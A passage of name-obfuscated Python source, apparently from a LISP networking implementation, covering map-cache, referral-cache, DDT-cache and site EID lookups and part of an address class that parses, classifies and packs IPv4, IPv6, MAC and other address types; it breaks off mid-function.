if 78 - 78: OoOoOO00 - oO0o . I1ii11iIi11i * i11iIiiIii
if 44 - 44: iIii1I11I1II1 * iII111i
if ( o0oO0O00 == False ) :
i1iI11i = green ( o0o000Oo . eid . print_prefix ( ) , False )
dprint ( "Lookup for EID {} found map-cache entry {}" . format ( green ( dest . print_address ( ) , False ) , i1iI11i ) )
if 32 - 32: OoOoOO00
return ( o0o000Oo )
if 65 - 65: iIii1I11I1II1 + iII111i
if 90 - 90: i11iIiiIii - Oo0Ooo
if 31 - 31: OoOoOO00 + OoOoOO00 + OoooooooOO % O0
if 14 - 14: i1IIi / OoooooooOO . I1IiiI * I1Ii111 + OoO0O00
if 45 - 45: OoooooooOO * I1Ii111
o0o000Oo = o0o000Oo . lookup_source_cache ( source , False )
if ( o0o000Oo == None ) :
I11i11i1 = source . print_sg ( dest )
dprint ( "Lookup for EID {} not found in map-cache" . format ( I11i11i1 ) )
return ( None )
if 7 - 7: O0
if 42 - 42: o0oOOo0O0Ooo / Ii1I
if 31 - 31: OOooOOo
if 20 - 20: i11iIiiIii * oO0o * ooOoO0o
if 65 - 65: I1ii11iIi11i / Oo0Ooo / I1IiiI + IiII
i1iI11i = green ( o0o000Oo . print_eid_tuple ( ) , False )
dprint ( "Lookup for EID {} found map-cache entry {}" . format ( green ( source . print_sg ( dest ) , False ) , i1iI11i ) )
if 71 - 71: OoO0O00 . I1Ii111 + OoooooooOO
return ( o0o000Oo )
if 9 - 9: OoooooooOO / iIii1I11I1II1 % I1IiiI . I1IiiI / I11i - iII111i
if 60 - 60: I11i - OoO0O00 - OoOoOO00 * ooOoO0o - i1IIi
if 18 - 18: ooOoO0o + i11iIiiIii + O0 + OOooOOo / Ii1I
if 65 - 65: I1IiiI . ooOoO0o
if 51 - 51: I1Ii111
if 89 - 89: Oo0Ooo
if 15 - 15: OOooOOo * II111iiii - OOooOOo * iIii1I11I1II1
def lisp_referral_cache_lookup ( eid , group , exact ) :
if ( group and group . is_null ( ) ) :
IiII111IiII1 = lisp_referral_cache . lookup_cache ( eid , exact )
return ( IiII111IiII1 )
if 95 - 95: I1Ii111 / OoooooooOO * I11i * OoooooooOO
if 88 - 88: I1IiiI / Oo0Ooo / oO0o + oO0o % OOooOOo + Oo0Ooo
if 63 - 63: o0oOOo0O0Ooo + i11iIiiIii % OOooOOo % iIii1I11I1II1 / I1ii11iIi11i - iII111i
if 72 - 72: iII111i % oO0o . IiII + I1ii11iIi11i . IiII . II111iiii
if 10 - 10: I11i . ooOoO0o + I11i * Ii1I
if ( eid == None or eid . is_null ( ) ) : return ( None )
if 55 - 55: OOooOOo / iII111i + OoooooooOO - OoooooooOO
if 51 - 51: O0 % Ii1I % Oo0Ooo - O0
if 94 - 94: OoooooooOO - ooOoO0o % I1ii11iIi11i + I1Ii111
if 51 - 51: I1ii11iIi11i . iII111i / i1IIi * ooOoO0o % I11i
if 82 - 82: O0 % OoOoOO00 . iII111i . i1IIi . iII111i - Oo0Ooo
if 58 - 58: O0 * OOooOOo
IiII111IiII1 = lisp_referral_cache . lookup_cache ( group , exact )
if ( IiII111IiII1 == None ) : return ( None )
if 60 - 60: ooOoO0o
iiIIII = IiII111IiII1 . lookup_source_cache ( eid , exact )
if ( iiIIII ) : return ( iiIIII )
if 11 - 11: i1IIi
if ( exact ) : IiII111IiII1 = None
return ( IiII111IiII1 )
if 77 - 77: I11i + i1IIi * OoOoOO00 % OoooooooOO
if 56 - 56: I1Ii111 * i1IIi % i11iIiiIii
if 56 - 56: Ii1I . iII111i
if 76 - 76: I1IiiI / Ii1I % OoOoOO00 + IiII / i11iIiiIii . o0oOOo0O0Ooo
if 31 - 31: oO0o * oO0o % o0oOOo0O0Ooo . O0 + iII111i
if 52 - 52: i11iIiiIii
if 1 - 1: i1IIi * iIii1I11I1II1
def lisp_ddt_cache_lookup ( eid , group , exact ) :
if ( group . is_null ( ) ) :
IIIIii11i1I = lisp_ddt_cache . lookup_cache ( eid , exact )
return ( IIIIii11i1I )
if 29 - 29: I11i
if 12 - 12: oO0o % i1IIi - oO0o / ooOoO0o * II111iiii % ooOoO0o
if 6 - 6: IiII / OoO0O00
if 83 - 83: IiII - iIii1I11I1II1 * ooOoO0o - oO0o
if 77 - 77: Ii1I
if ( eid . is_null ( ) ) : return ( None )
if 9 - 9: OOooOOo / OoooooooOO + iII111i
if 52 - 52: IiII / OOooOOo * iIii1I11I1II1 + o0oOOo0O0Ooo
if 20 - 20: I1Ii111
if 33 - 33: i11iIiiIii / I1Ii111 + IiII / II111iiii + I11i
if 13 - 13: i1IIi % iII111i + OoOoOO00 / Ii1I . Ii1I + II111iiii
if 44 - 44: OoOoOO00 / OoooooooOO % O0 * Ii1I * IiII
IIIIii11i1I = lisp_ddt_cache . lookup_cache ( group , exact )
if ( IIIIii11i1I == None ) : return ( None )
if 84 - 84: o0oOOo0O0Ooo * IiII * OOooOOo * iII111i
O0oooo0oO00O = IIIIii11i1I . lookup_source_cache ( eid , exact )
if ( O0oooo0oO00O ) : return ( O0oooo0oO00O )
if 52 - 52: Ii1I
if ( exact ) : IIIIii11i1I = None
return ( IIIIii11i1I )
if 97 - 97: OOooOOo * i1IIi + OoOoOO00 . Oo0Ooo
if 5 - 5: I1ii11iIi11i + IiII + I1ii11iIi11i
if 28 - 28: Ii1I % o0oOOo0O0Ooo * IiII
if 20 - 20: OoOoOO00 / I11i * O0 + Ii1I - OoOoOO00 % ooOoO0o
if 99 - 99: o0oOOo0O0Ooo / i1IIi * OOooOOo % iII111i
if 18 - 18: iII111i * i1IIi / II111iiii / Oo0Ooo
if 47 - 47: Ii1I / i1IIi - iII111i - i11iIiiIii
def lisp_site_eid_lookup ( eid , group , exact ) :
if 3 - 3: OoOoOO00
if ( group . is_null ( ) ) :
o0o000 = lisp_sites_by_eid . lookup_cache ( eid , exact )
return ( o0o000 )
if 53 - 53: II111iiii / II111iiii . O0 - oO0o . i1IIi
if 45 - 45: OoOoOO00 + I1Ii111 + Oo0Ooo
if 73 - 73: OoO0O00 / o0oOOo0O0Ooo % Ii1I * ooOoO0o
if 94 - 94: I1IiiI . iII111i - iIii1I11I1II1 . Oo0Ooo
if 40 - 40: Ii1I
if ( eid . is_null ( ) ) : return ( None )
if 26 - 26: OoO0O00 / IiII
if 31 - 31: Ii1I / OoO0O00 % ooOoO0o / I11i . I1ii11iIi11i
if 41 - 41: I1ii11iIi11i * ooOoO0o * I11i + O0 * O0 - O0
if 81 - 81: I1Ii111 % OoO0O00 / O0
if 55 - 55: i1IIi - I1Ii111 + I11i
if 93 - 93: I1IiiI % IiII . OoOoOO00 + iII111i
o0o000 = lisp_sites_by_eid . lookup_cache ( group , exact )
if ( o0o000 == None ) : return ( None )
if 81 - 81: ooOoO0o / I1Ii111 + OOooOOo / Oo0Ooo / OoOoOO00
if 34 - 34: ooOoO0o * iIii1I11I1II1 % i11iIiiIii * OOooOOo - OOooOOo
if 63 - 63: Oo0Ooo / oO0o + iII111i % OoooooooOO * I11i
if 34 - 34: I1IiiI + I1Ii111 % ooOoO0o
if 24 - 24: Ii1I % II111iiii - i11iIiiIii
if 52 - 52: OoO0O00
if 76 - 76: ooOoO0o - iII111i % ooOoO0o / oO0o . OOooOOo
if 50 - 50: IiII . i11iIiiIii % I11i
if 22 - 22: i1IIi - II111iiii - OoOoOO00 . iII111i
if 43 - 43: I1Ii111 * OOooOOo - IiII . i11iIiiIii
if 34 - 34: iII111i . OoOoOO00
if 49 - 49: I1ii11iIi11i % oO0o - I1Ii111 . I1ii11iIi11i % II111iiii
if 20 - 20: I1ii11iIi11i . iIii1I11I1II1 - Ii1I % OoO0O00
if 27 - 27: iIii1I11I1II1 / I1Ii111 - I11i . OoO0O00 + ooOoO0o
if 89 - 89: I1IiiI % I11i - OOooOOo
if 71 - 71: OOooOOo % Oo0Ooo - o0oOOo0O0Ooo / I1Ii111 - O0 - oO0o
if 10 - 10: I1IiiI
if 17 - 17: i11iIiiIii % o0oOOo0O0Ooo . ooOoO0o
i1I1I = o0o000 . lookup_source_cache ( eid , exact )
if ( i1I1I ) : return ( i1I1I )
if 34 - 34: OoooooooOO / iII111i / O0
if ( exact ) :
o0o000 = None
else :
O0Ii1IiiiI = o0o000 . parent_for_more_specifics
if ( O0Ii1IiiiI and O0Ii1IiiiI . accept_more_specifics ) :
if ( group . is_more_specific ( O0Ii1IiiiI . group ) ) : o0o000 = O0Ii1IiiiI
if 75 - 75: I11i % OOooOOo - OoO0O00 * I11i * IiII
if 11 - 11: I1ii11iIi11i . O0 - iII111i * IiII . i1IIi . iII111i
return ( o0o000 )
if 82 - 82: i1IIi * I11i * Ii1I - IiII . i11iIiiIii
if 40 - 40: OOooOOo - OoooooooOO
if 36 - 36: i1IIi % OoOoOO00 - i1IIi
if 5 - 5: I1IiiI . I1IiiI % II111iiii - I1Ii111
if 97 - 97: I11i . ooOoO0o
if 87 - 87: oO0o / iIii1I11I1II1 - I11i + OoooooooOO
if 79 - 79: I1ii11iIi11i * IiII . I1ii11iIi11i
if 65 - 65: iII111i - Ii1I - II111iiii * O0 + I1ii11iIi11i . iIii1I11I1II1
if 76 - 76: OoO0O00 * ooOoO0o
if 32 - 32: O0 . oO0o * o0oOOo0O0Ooo . Ii1I + IiII
if 98 - 98: iII111i . II111iiii % O0
if 43 - 43: OOooOOo % I1Ii111 . IiII % OoO0O00 + I1Ii111 % OoooooooOO
if 17 - 17: OoooooooOO - i1IIi * I11i
if 33 - 33: i1IIi . Oo0Ooo + I11i
if 97 - 97: OOooOOo / IiII / ooOoO0o / OoooooooOO
if 78 - 78: I1Ii111 + I1Ii111
if 43 - 43: I1Ii111 * o0oOOo0O0Ooo + i1IIi
if 19 - 19: Ii1I
if 51 - 51: oO0o
if 57 - 57: i11iIiiIii - Oo0Ooo + I1Ii111 * OoO0O00
if 35 - 35: o0oOOo0O0Ooo % II111iiii + O0
if 70 - 70: I1ii11iIi11i . II111iiii
if 54 - 54: OOooOOo
if 67 - 67: I1IiiI . o0oOOo0O0Ooo / i1IIi * I1ii11iIi11i . Oo0Ooo + II111iiii
if 63 - 63: OoOoOO00 - OoOoOO00
if 31 - 31: I1ii11iIi11i % O0 - i11iIiiIii * o0oOOo0O0Ooo . ooOoO0o * ooOoO0o
class lisp_address ( ) :
def __init__ ( self , afi , addr_str , mask_len , iid ) :
self . afi = afi
self . mask_len = mask_len
self . instance_id = iid
self . iid_list = [ ]
self . address = 0
if ( addr_str != "" ) : self . store_address ( addr_str )
if 18 - 18: OoO0O00 - OoO0O00 . o0oOOo0O0Ooo
if 80 - 80: I11i + I1Ii111 / I1IiiI * OOooOOo % iII111i
def copy_address ( self , addr ) :
if ( addr == None ) : return
self . afi = addr . afi
self . address = addr . address
self . mask_len = addr . mask_len
self . instance_id = addr . instance_id
self . iid_list = addr . iid_list
if 48 - 48: iIii1I11I1II1 + i1IIi . I1IiiI % OoO0O00 - iIii1I11I1II1 / i1IIi
if 14 - 14: IiII . I11i
def make_default_route ( self , addr ) :
self . afi = addr . afi
self . instance_id = addr . instance_id
self . mask_len = 0
self . address = 0
if 13 - 13: OoOoOO00 - I11i . OOooOOo % OoO0O00
if 79 - 79: iII111i / Ii1I % i11iIiiIii . I1IiiI % OoO0O00 / i11iIiiIii
def make_default_multicast_route ( self , addr ) :
self . afi = addr . afi
self . instance_id = addr . instance_id
if ( self . afi == LISP_AFI_IPV4 ) :
self . address = 0xe0000000
self . mask_len = 4
if 100 - 100: OOooOOo + Oo0Ooo . iIii1I11I1II1 . ooOoO0o * Oo0Ooo
if ( self . afi == LISP_AFI_IPV6 ) :
self . address = 0xff << 120
self . mask_len = 8
if 16 - 16: Oo0Ooo % OoOoOO00 + I1Ii111 % I1Ii111
if ( self . afi == LISP_AFI_MAC ) :
self . address = 0xffffffffffff
self . mask_len = 48
if 12 - 12: I1Ii111 . Ii1I / iIii1I11I1II1 + i1IIi
if 9 - 9: iIii1I11I1II1
if 75 - 75: I11i . II111iiii * I1IiiI * IiII
def not_set ( self ) :
return ( self . afi == LISP_AFI_NONE )
if 36 - 36: OOooOOo / I1ii11iIi11i / oO0o / ooOoO0o / I11i
if 7 - 7: OoO0O00 - I11i - o0oOOo0O0Ooo / o0oOOo0O0Ooo + i11iIiiIii
def is_private_address ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
IiiIIi1 = self . address
if ( ( ( IiiIIi1 & 0xff000000 ) >> 24 ) == 10 ) : return ( True )
if ( ( ( IiiIIi1 & 0xff000000 ) >> 24 ) == 172 ) :
IIi1IiiIiiI = ( IiiIIi1 & 0x00ff0000 ) >> 16
if ( IIi1IiiIiiI >= 16 and IIi1IiiIiiI <= 31 ) : return ( True )
if 47 - 47: II111iiii / o0oOOo0O0Ooo * o0oOOo0O0Ooo + oO0o
if ( ( ( IiiIIi1 & 0xffff0000 ) >> 16 ) == 0xc0a8 ) : return ( True )
return ( False )
if 3 - 3: Oo0Ooo
if 82 - 82: OoooooooOO + OoO0O00 . OoO0O00 * OoO0O00
def is_multicast_address ( self ) :
if ( self . is_ipv4 ( ) ) : return ( self . is_ipv4_multicast ( ) )
if ( self . is_ipv6 ( ) ) : return ( self . is_ipv6_multicast ( ) )
if ( self . is_mac ( ) ) : return ( self . is_mac_multicast ( ) )
return ( False )
if 99 - 99: I1ii11iIi11i - OoooooooOO - Ii1I / Oo0Ooo
if 96 - 96: o0oOOo0O0Ooo . II111iiii
def host_mask_len ( self ) :
if ( self . afi == LISP_AFI_IPV4 ) : return ( LISP_IPV4_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_IPV6 ) : return ( LISP_IPV6_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_MAC ) : return ( LISP_MAC_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_E164 ) : return ( LISP_E164_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_NAME ) : return ( len ( self . address ) * 8 )
if ( self . afi == LISP_AFI_GEO_COORD ) :
return ( len ( self . address . print_geo ( ) ) * 8 )
if 14 - 14: OoooooooOO - i1IIi / i11iIiiIii - OOooOOo - i11iIiiIii . ooOoO0o
return ( 0 )
if 8 - 8: oO0o * O0 - II111iiii + I1IiiI
if 85 - 85: OoooooooOO % i11iIiiIii / IiII % OoOoOO00 + O0
def is_iana_eid ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
IiiIIi1 = self . address >> 96
return ( IiiIIi1 == 0x20010005 )
if 6 - 6: OoooooooOO
if 97 - 97: II111iiii + o0oOOo0O0Ooo * II111iiii
def addr_length ( self ) :
if ( self . afi == LISP_AFI_IPV4 ) : return ( 4 )
if ( self . afi == LISP_AFI_IPV6 ) : return ( 16 )
if ( self . afi == LISP_AFI_MAC ) : return ( 6 )
if ( self . afi == LISP_AFI_E164 ) : return ( 8 )
if ( self . afi == LISP_AFI_LCAF ) : return ( 0 )
if ( self . afi == LISP_AFI_NAME ) : return ( len ( self . address ) + 1 )
if ( self . afi == LISP_AFI_IID_RANGE ) : return ( 4 )
if ( self . afi == LISP_AFI_GEO_COORD ) :
return ( len ( self . address . print_geo ( ) ) )
if 17 - 17: o0oOOo0O0Ooo / ooOoO0o + i1IIi
return ( 0 )
if 78 - 78: iIii1I11I1II1 * o0oOOo0O0Ooo * Oo0Ooo - OoO0O00 / OoO0O00
if 89 - 89: o0oOOo0O0Ooo % o0oOOo0O0Ooo
def afi_to_version ( self ) :
if ( self . afi == LISP_AFI_IPV4 ) : return ( 4 )
if ( self . afi == LISP_AFI_IPV6 ) : return ( 6 )
return ( 0 )
if 8 - 8: Ii1I % oO0o - o0oOOo0O0Ooo
if 14 - 14: OOooOOo * IiII
def packet_format ( self ) :
if 15 - 15: o0oOOo0O0Ooo + OoooooooOO - OOooOOo - o0oOOo0O0Ooo . iIii1I11I1II1 / Ii1I
if 33 - 33: OoO0O00
if 91 - 91: I11i % I11i % iII111i
if 19 - 19: I11i / I11i + I1IiiI * OoO0O00 - iII111i . Oo0Ooo
if 76 - 76: iII111i % OOooOOo / OoooooooOO . I1IiiI % OoO0O00 % i1IIi
if ( self . afi == LISP_AFI_IPV4 ) : return ( "I" )
if ( self . afi == LISP_AFI_IPV6 ) : return ( "QQ" )
if ( self . afi == LISP_AFI_MAC ) : return ( "HHH" )
if ( self . afi == LISP_AFI_E164 ) : return ( "II" )
if ( self . afi == LISP_AFI_LCAF ) : return ( "I" )
return ( "" )
if 95 - 95: Oo0Ooo - O0 / I1ii11iIi11i . I1IiiI / o0oOOo0O0Ooo % OoOoOO00
if 38 - 38: OoOoOO00 % OoooooooOO . oO0o - OoooooooOO + I11i
def pack_address ( self ) :
i1I1iii1I11II = self . packet_format ( )
IiiiIi1iiii11 = ""
if ( self . is_ipv4 ( ) ) :
IiiiIi1iiii11 = struct . pack ( i1I1iii1I11II , socket . htonl ( self . address ) )
elif ( self . is_ipv6 ( ) ) :
ooOo0O0 = byte_swap_64 ( self . address >> 64 )
ooo0 = byte_swap_64 ( self . address & 0xffffffffffffffff )
IiiiIi1iiii11 = struct . pack ( i1I1iii1I11II , ooOo0O0 , ooo0 )
elif ( self . is_mac ( ) ) :
IiiIIi1 = self . address
ooOo0O0 = ( IiiIIi1 >> 32 ) & 0xffff
ooo0 = ( IiiIIi1 >> 16 ) & 0xffff
Ii11III = IiiIIi1 & 0xffff
IiiiIi1iiii11 = struct . pack ( i1I1iii1I11II , ooOo0O0 , ooo0 , Ii11III )
elif ( self . is_e164 ( ) ) :
IiiIIi1 = self . address
ooOo0O0 = ( IiiIIi1 >> 32 ) & 0xffffffff
ooo0 = ( IiiIIi1 & 0xffffffff )
IiiiIi1iiii11 = struct . pack ( i1I1iii1I11II , ooOo0O0 , ooo0 )
elif ( self . is_dist_name ( ) ) :
IiiiIi1iiii11 += self . address + "\0"
if 42 - 42: oO0o % OoOoOO00 - oO0o + I11i / i11iIiiIii
return ( IiiiIi1iiii11 )
if 74 - 74: OoO0O00 - II111iiii - ooOoO0o % i1IIi
if 42 - 42: i11iIiiIii / O0
def unpack_address ( self , packet ) :
i1I1iii1I11II = self . packet_format ( )
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 8 - 8: I1Ii111
IiiIIi1 = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
if 51 - 51: i11iIiiIii
if ( self . is_ipv4 ( ) ) :
self . address = socket . ntohl ( IiiIIi1 [ 0 ] )
if 1 - 1: iIii1I11I1II1 . i1IIi . i11iIiiIii % I1ii11iIi11i
elif ( self . is_ipv6 ( ) ) :
if 58 - 58: i11iIiiIii * i11iIiiIii - OoO0O00
if 8 - 8: i11iIiiIii * OoOoOO00 . o0oOOo0O0Ooo
if 27 - 27: I1ii11iIi11i + Ii1I % I1Ii111
if 20 - 20: Oo0Ooo
if 33 - 33: oO0o - OoOoOO00 - i11iIiiIii + I1Ii111 + iIii1I11I1II1
if 2 - 2: OoooooooOO + IiII / iII111i . iIii1I11I1II1 * OoOoOO00
if 84 - 84: OOooOOo
if 68 - 68: I1Ii111
if ( IiiIIi1 [ 0 ] <= 0xffff and ( IiiIIi1 [ 0 ] & 0xff ) == 0 ) :
OOo00OoOOOOO0 = ( IiiIIi1 [ 0 ] << 48 ) << 64
else :
OOo00OoOOOOO0 = byte_swap_64 ( IiiIIi1 [ 0 ] ) << 64
if 42 - 42: OoooooooOO . i11iIiiIii - I1Ii111 . OOooOOo . I1Ii111 / OoO0O00
Ii1i1ii = byte_swap_64 ( IiiIIi1 [ 1 ] )
self . address = OOo00OoOOOOO0 | Ii1i1ii
if 33 - 33: o0oOOo0O0Ooo - OoOoOO00 / I1Ii111 % iIii1I11I1II1 - ooOoO0o
elif ( self . is_mac ( ) ) :
oOiII1i1 = IiiIIi1 [ 0 ]
ii1III = IiiIIi1 [ 1 ]
Ii11 = IiiIIi1 [ 2 ]
self . address = ( oOiII1i1 << 32 ) + ( ii1III << 16 ) + Ii11
if 51 - 51: iIii1I11I1II1 / oO0o * I1Ii111 + i1IIi
elif ( self . is_e164 ( ) ) :
self . address = ( IiiIIi1 [ 0 ] << 32 ) + IiiIIi1 [ 1 ]
if 96 - 96: Oo0Ooo + oO0o - Oo0Ooo - OoOoOO00 % OOooOOo . iIii1I11I1II1
elif ( self . is_dist_name ( ) ) :
packet , self . address = lisp_decode_dist_name ( packet )
self . mask_len = len ( self . address ) * 8
Iiiii = 0
if 93 - 93: iIii1I11I1II1 % OoooooooOO
packet = packet [ Iiiii : : ]
return ( packet )
if 6 - 6: II111iiii / oO0o - OOooOOo . O0 - o0oOOo0O0Ooo
if 72 - 72: iIii1I11I1II1 / OoooooooOO * ooOoO0o / ooOoO0o % O0 + IiII
def is_ipv4 ( self ) :
return ( True if ( self . afi == LISP_AFI_IPV4 ) else False )
if 96 - 96: iII111i / i11iIiiIii + Oo0Ooo . I1IiiI + iII111i % OoOoOO00
if 19 - 19: i11iIiiIii . Oo0Ooo . OoOoOO00 - I1IiiI
def is_ipv4_link_local ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
return ( ( ( self . address >> 16 ) & 0xffff ) == 0xa9fe )
if 85 - 85: I11i - OoO0O00 % iIii1I11I1II1 . iII111i + ooOoO0o . Oo0Ooo
if 87 - 87: iII111i
def is_ipv4_loopback ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
return ( self . address == 0x7f000001 )
if 86 - 86: IiII - I11i
if 99 - 99: i1IIi + I1ii11iIi11i
def is_ipv4_multicast ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
return ( ( ( self . address >> 24 ) & 0xf0 ) == 0xe0 )
if 24 - 24: ooOoO0o / OoooooooOO % I1ii11iIi11i * ooOoO0o
if 14 - 14: I1ii11iIi11i + OoO0O00 - I1IiiI - Oo0Ooo
def is_ipv4_string ( self , addr_str ) :
return ( addr_str . find ( "." ) != - 1 )
if 44 - 44: II111iiii / I1ii11iIi11i
if 39 - 39: OoooooooOO % OoO0O00
def is_ipv6 ( self ) :
return ( True if ( self . afi == LISP_AFI_IPV6 ) else False )
if 83 - 83: OOooOOo % I1IiiI + O0 % OoooooooOO
if 84 - 84: I11i - Oo0Ooo % ooOoO0o - II111iiii
def is_ipv6_link_local ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
return ( ( ( self . address >> 112 ) & 0xffff ) == 0xfe80 )
if 29 - 29: IiII
if 4 - 4: II111iiii * o0oOOo0O0Ooo - IiII * iII111i
def is_ipv6_string_link_local ( self , addr_str ) :
return ( addr_str . find ( "fe80::" ) != - 1 )
if 91 - 91: I1Ii111 * iII111i * OoO0O00
if 79 - 79: iII111i + oO0o
def is_ipv6_loopback ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
return ( self . address == 1 )
if 19 - 19: I1Ii111 - OOooOOo . ooOoO0o . O0 + II111iiii . OoooooooOO
if 97 - 97: O0 / OoOoOO00 / ooOoO0o
def is_ipv6_multicast ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
return ( ( ( self . address >> 120 ) & 0xff ) == 0xff )
if 11 - 11: II111iiii . i11iIiiIii - Ii1I . IiII
if 10 - 10: OOooOOo * OoooooooOO
def is_ipv6_string ( self , addr_str ) :
return ( addr_str . find ( ":" ) != - 1 )
if 12 - 12: II111iiii - O0 . i1IIi % oO0o % OoooooooOO
if 36 - 36: IiII * OoOoOO00 - iIii1I11I1II1 + II111iiii
def is_mac ( self ) :
return ( True if ( self . afi == LISP_AFI_MAC ) else False )
if 65 - 65: I1IiiI * I11i . I1Ii111 % I1ii11iIi11i + O0
if 91 - 91: OoooooooOO % I1Ii111 * OoO0O00 - OoOoOO00
def is_mac_multicast ( self ) :
if ( self . is_mac ( ) == False ) : return ( False )
return ( ( self . address & 0x010000000000 ) != 0 )
if 5 - 5: iIii1I11I1II1 * I11i - oO0o % oO0o % o0oOOo0O0Ooo . i1IIi
if 95 - 95: Oo0Ooo * I1ii11iIi11i + iII111i - o0oOOo0O0Ooo - Oo0Ooo . OoO0O00
def is_mac_broadcast ( self ) :
if ( self . is_mac ( ) == False ) : return ( False )
return ( self . address == 0xffffffffffff )
if 62 - 62: I11i
if 58 - 58: I11i . OoOoOO00 + iII111i . iII111i
def is_mac_string ( self , addr_str ) :
return ( len ( addr_str ) == 15 and addr_str . find ( "-" ) != - 1 )
if 43 - 43: I1Ii111 + I1Ii111 % Oo0Ooo % OoO0O00 - ooOoO0o
if 61 - 61: OoOoOO00 + Ii1I % i11iIiiIii - I1IiiI * OoO0O00 % iIii1I11I1II1
def is_link_local_multicast ( self ) :
if ( self . is_ipv4 ( ) ) :
return ( ( 0xe0ffff00 & self . address ) == 0xe0000000 )
if 66 - 66: iII111i + i1IIi
if ( self . is_ipv6 ( ) ) :
return ( ( self . address >> 112 ) & 0xffff == 0xff02 )
if 24 - 24: O0 / OoooooooOO - OoOoOO00
return ( False )
if 51 - 51: OoO0O00 + o0oOOo0O0Ooo - II111iiii * I11i + Ii1I
if 16 - 16: I1Ii111 * i1IIi . I1IiiI . OOooOOo % Ii1I - o0oOOo0O0Ooo
def is_null ( self ) :
return ( True if ( self . afi == LISP_AFI_NONE ) else False )
if 89 - 89: Ii1I * I1ii11iIi11i * I1IiiI % iII111i % Ii1I + O0
if 53 - 53: i11iIiiIii % I1ii11iIi11i
def is_ultimate_root ( self ) :
return ( True if self . afi == LISP_AFI_ULTIMATE_ROOT else False )
if 59 - 59: OOooOOo
if 61 - 61: OoooooooOO + O0 - i1IIi % oO0o / I1ii11iIi11i
def is_iid_range ( self ) :
return ( True if self . afi == LISP_AFI_IID_RANGE else False )
if 50 - 50: oO0o + II111iiii * OoOoOO00 % OoO0O00 . II111iiii % o0oOOo0O0Ooo
if 32 - 32: i1IIi / Ii1I + i11iIiiIii % oO0o
def is_e164 ( self ) :
return ( True if ( self . afi == LISP_AFI_E164 ) else False )
if 11 - 11: Ii1I - ooOoO0o % i11iIiiIii / OoooooooOO - O0 - IiII
if 25 - 25: IiII + O0 + oO0o % iIii1I11I1II1 - II111iiii . I1IiiI
def is_dist_name ( self ) :
return ( True if ( self . afi == LISP_AFI_NAME ) else False )
if 62 - 62: IiII . O0 + oO0o - ooOoO0o * iIii1I11I1II1
if 8 - 8: I1ii11iIi11i
def is_geo_prefix ( self ) :
return ( True if ( self . afi == LISP_AFI_GEO_COORD ) else False )
if 65 - 65: i11iIiiIii
if 92 - 92: oO0o * II111iiii + I1Ii111
def is_binary ( self ) :
if ( self . is_dist_name ( ) ) : return ( False )
if ( self . is_geo_prefix ( ) ) : return ( False )
return ( True )
if 49 - 49: II111iiii * I1IiiI * O0 / ooOoO0o * IiII
if 94 - 94: OoO0O00 - I1IiiI * oO0o
def store_address ( self , addr_str ) :
if ( self . afi == LISP_AFI_NONE ) : self . string_to_afi ( addr_str )
if 35 - 35: OOooOOo / i1IIi + OoO0O00
if 31 - 31: OoO0O00 . i1IIi / OoooooooOO
if 81 - 81: ooOoO0o . Oo0Ooo . OoOoOO00 + OOooOOo % iII111i - oO0o
if 68 - 68: iII111i - O0 / Ii1I
IiIIi1IiiIiI = addr_str . find ( "[" )
OO00O0O = addr_str . find ( "]" )
if ( IiIIi1IiiIiI != - 1 and OO00O0O != - 1 ) :
self . instance_id = int ( addr_str [ IiIIi1IiiIiI + 1 : OO00O0O ] )
addr_str = addr_str [ OO00O0O + 1 : : ]
if ( self . is_dist_name ( ) == False ) :
addr_str = addr_str . replace ( " " , "" )
if 15 - 15: I1Ii111 / I1ii11iIi11i / I1IiiI % i11iIiiIii + II111iiii . ooOoO0o
if 74 - 74: o0oOOo0O0Ooo
if 4 - 4: I1ii11iIi11i * II111iiii - Oo0Ooo % i1IIi % O0 * i11iIiiIii
if 62 - 62: OoO0O00 * I1Ii111 * Ii1I / ooOoO0o
if 27 - 27: oO0o . iII111i . oO0o
if 37 - 37: Oo0Ooo . I1ii11iIi11i / OoooooooOO % ooOoO0o / I1IiiI + ooOoO0o
if ( self . is_ipv4 ( ) ) :
I1i11I = addr_str . split ( "." )
i11II = int ( I1i11I [ 0 ] ) << 24
i11II += int ( I1i11I [ 1 ] ) << 16
i11II += int ( I1i11I [ 2 ] ) << 8
i11II += int ( I1i11I [ 3 ] )
self . address = i11II
elif ( self . is_ipv6 ( ) ) :
if 71 - 71: iIii1I11I1II1 % I1Ii111 % IiII / IiII + iIii1I11I1II1 % i1IIi
if 93 - 93: Oo0Ooo / I1ii11iIi11i + Oo0Ooo + OOooOOo
if 58 - 58: oO0o
if 9 - 9: I1Ii111 - i1IIi . ooOoO0o
if 33 - 33: I11i
if 37 - 37: Oo0Ooo
if 36 - 36: IiII % I11i
if 72 - 72: oO0o % I11i % OOooOOo * iIii1I11I1II1 - OOooOOo % O0
if 84 - 84: oO0o - o0oOOo0O0Ooo / II111iiii . o0oOOo0O0Ooo
if 82 - 82: OoooooooOO
if 14 - 14: OoO0O00 / oO0o - OOooOOo
if 100 - 100: IiII - I11i . iIii1I11I1II1 / iIii1I11I1II1
if 16 - 16: IiII + Oo0Ooo % I11i
if 16 - 16: ooOoO0o / I1Ii111
if 78 - 78: OoOoOO00 - II111iiii - OOooOOo + I1IiiI + O0 / I1IiiI
if 59 - 59: OOooOOo . I1IiiI / i1IIi / II111iiii . II111iiii
if 54 - 54: iIii1I11I1II1 % ooOoO0o
IIII1iiIiiI = ( addr_str [ 2 : 4 ] == "::" )
try :
addr_str = socket . inet_pton ( socket . AF_INET6 , addr_str )
except :
addr_str = socket . inet_pton ( socket . AF_INET6 , "0::0" )
if 92 - 92: I11i + OoO0O00 . OoooooooOO
addr_str = binascii . hexlify ( addr_str )
if 3 - 3: OoO0O00 % iIii1I11I1II1
if ( IIII1iiIiiI ) :
